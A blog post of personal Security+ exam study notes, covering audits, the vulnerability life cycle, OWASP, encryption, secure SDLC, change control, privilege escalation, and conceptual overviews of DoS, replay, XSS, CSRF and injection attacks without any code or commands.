Sec+ preparation #6

Table of contents

Intro
Let’s jump into next day of preparing for SEC+.
Before beginning I just want to give credit to Master OTW at Hackers-Arise. I really enjoy how he describes data of various topics. Real professional.
You can purchase Security+ SY0-701 boot camp here
Metasploit
- One of the best exploitation framework
Security Audits
There can be:
Internal audits
- Your own people will not want to find problems.
External audits
Independent third-party audits
- This one is the most effective
Vulnerability Life Cycle (will be in exam)
Identification → Analysis → Response and Remediation → Validation of Remediation → Reporting
After this cycle you do it again.
This is not a process that you want, but the process that you do continuously. (will be in exam)
Application Security
Application needs to be secure. WWW is a broad field and there has to be some kind of security servers for your application.
OWASP (The Open Web Application Security Project)
If you need experience for job, you can volunteer in OWASP projects.
They do really good things.
It’s a non profit organization
All materials available for FREE
They developed many tools such as OWASP ZAP.
OWASP TOP10 is important in cybersecurity field.
Protecting Data on Devices
Hierarchical Storage Management (HSM)
Move data to low cost devices for long term
May need to encrypt the data to protect it
- You should encrypt the data!!!
Also called tiered storage
USB Encryption
Full hard drive encryption
Data encryption
It’s a last layer of Protection
Full disk encryption
- You loose the device, you don’t expose the data
Database
- Encrypted tables or records for sensitive data
Individual Files
- Soft for that - PGP, AXCrypt
Removable Media
- Easy to loose, small size, often times in clear text
Mobile Devices
- Large amount of storage, may contain business data.
Software Security Downfalls
Most attacks take advantage of a weakness (vulnerability)
Most vulnerabilities are in 99% of software. It’s everywhere.
More complex the software, more vulnerabilities it has.
Software is changing faster than software security
Businesses make money when they release new versions. New versions means new vulnerabilities.
Software Security Challenges
Security is not crucial during development stages
Many programmers do not practice secure coding
Focus is on functionality and not security
Fuzzing, also known as fuzz testing, is a software testing technique that involves feeding a program with random or invalid inputs to uncover bugs, security vulnerabilities, and crashes.
- Responsible companies does that
Software Development Methods
Project Development (will be in exam)
Security within software development:
Security should be planned from first step.
- At the initiation of the project is the best time. Remember this.
Everyone has to follow security policies. Starting from junior dev, ending with CEO.
Security controls should not be added after the fact.
Types of development methods:
Waterfall (will be in exam)
Traditional Model
Completion of one task leads to start of another
Long term projects
Agile (will be in exam)
Heavy interaction with stakeholders
Evolutionary software development
Multiple software releases.
It’s an iteration based method:
Plan
Design
Develop
Test
Deploy
Review
It’s most popular method
Software development life cycle (SDLC)
Different models with similar processes:
Project initiation (in this stage security should come in, but usually is skipped. It will always be asked in exam. First step is security. Remember it.)
Identify security requirements
Perform an initial risk analysis
Analyze threats
Estimate costs and benefits per countermeasure
Determine service level agreement (SLA)
Functional design analysis and planning
Define security requirements
Propose security checkpoints in plan
Preliminary security test plans
Formal functional baseline includes security requirements
System Design specifications
Define security specifications
Update test plans
Security specifications
Software Development
Write programming code to meet specifications
Implement security withing code
Unit tests
Installation/Test/Implementation
Test system components
User acceptence testing
Install system
Create manuals
Accept system
Operational/Maintenance
Maintain system through service level agreement (SLA)
After changes, re-certify
Audit an test security components periodically
- Must be done continuously
Disposal
Properly dispose of system
Repeat full cycle with new initiation
Data moved to another system
You must follow best practices if there are defined ones. Doesn’t matter what industry you’re in. You must follow best practices! If you tell that you did everything according to your industries best practices, you’re safe.
Verification vs. Validation
Verification
Determining if the product accurately represents the developer’s description and specifications
Follows structure and logic of the product
Validation
- Determining the degree to which the model represents a real world use
Change Control (always in exam)
You must document changes in your system and there has to be process to manage it.
If you want to change something, you need to make a request for permission to do it and you have to wait for approval.
It’s a really important thing.
Without proper change control, a project can take longer that appropriate to complete.
Apps should be centrally managed
Security controls must always be protected
Changes should be made to development environment and not production.
Procedures of change control
Request for change
Analyze request
Develop the implementation strategy
Calculate the cost of this implementation
Review any security implications
Record change request
Submit change request approval
Develop change
Re-code segments of the product, modify it’s functionality
Link these changes in the code to the formal request
Submit software for testing and QA
Repeat until quality is adequate
Make version changes
Report changes to management
Establish a baseline setting
Privilege Escalation
User has to get minimum privilege to do the job. Not more than they need.
It’s an important aspect.You can
Vertical Privilege escalation
Privilege elevation
Where lower privilege user accesses functions or content reserved for higher privilege users.
Horizontal privilege escalation
- For example moving from developer to HR, because they have lots of info.
Privilege De-escalation:
- Where high privileged users downgrade their access to access normal user functions
Always attempt to give the least amount of privileges to applications, users, and processes.
Practice exam
There’s a place for good practice exams:
BOSON - it costs 99$ for practice exam
Denial of Service (DoS)
Basically it is an exhaustion attacks.
Exploit some form of weakness or limitation.
Sending a large amount of data
SYN flooding
Mail bomb
ICMP smurf attack
Making a processor to use 100% load
Distributed Denial of Service (DDoS)
Usually many devices performing DoS. Usually botnets.
One master
Some of the botnets today have over 1 million hosts
Replay attacks
Similar to Man In The Middle Attack (MITM)
Could be credentials that have been captured
Username and passwords
Security token
Could be against cryptographic tools
Digital signature
Wireless connections are going by the air. They can be captured and replayed. This is where SDR steps in.
Wired connection is safer.
- Unsecured cookie can reveal credentials
Replay Attacks Protection
Update software with latest security patches (most important)
Use encryption, digital signature or VPN, SSL, SSH
Use timestamps
Secure Network entry points
- Disable unused ports
Monitor network for suspicious activities
Application attacks
Cross site scripting (CSS or XSS)
SQL injection
LDAP injection
XML injection (markup language to transfer data)
Directory Traversal / Comman Injection (this is the easiest)
Buffer overflow
Input Validation to prevent attacks
It checks what you sending to the system is legit.
Make sure that input validation is set up.
Fuzzing
It helps to check if input validation is correctly set up.
It just writes random data into inputs.
OWASP offers these tools for fuzzing:
Cross Site Scripting
You put a script into webpage.
Input validation defends against XSS
It can lead to:
SQL Injection
DNS redirect
DoS
Cookie hijack
Remote shell
Cross Site Request Forgery (CSRF)
Forces users to execute unwanted actions
- Changing user passoword, address, email address
Social engineering is usually needed
Can compromise data
It inherits the identity and privileges of victim
Injection Attacks
Injection attacks are one of the most popular attacks, so input validation could save you against trouble.
SQL Injection
LDAP Injection
XML Injection
Directory Traversal
Additional info
It is really important to know about OWASP TOP 10.
Subscribe to my newsletter
Read articles from Jonas Satkauskas directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
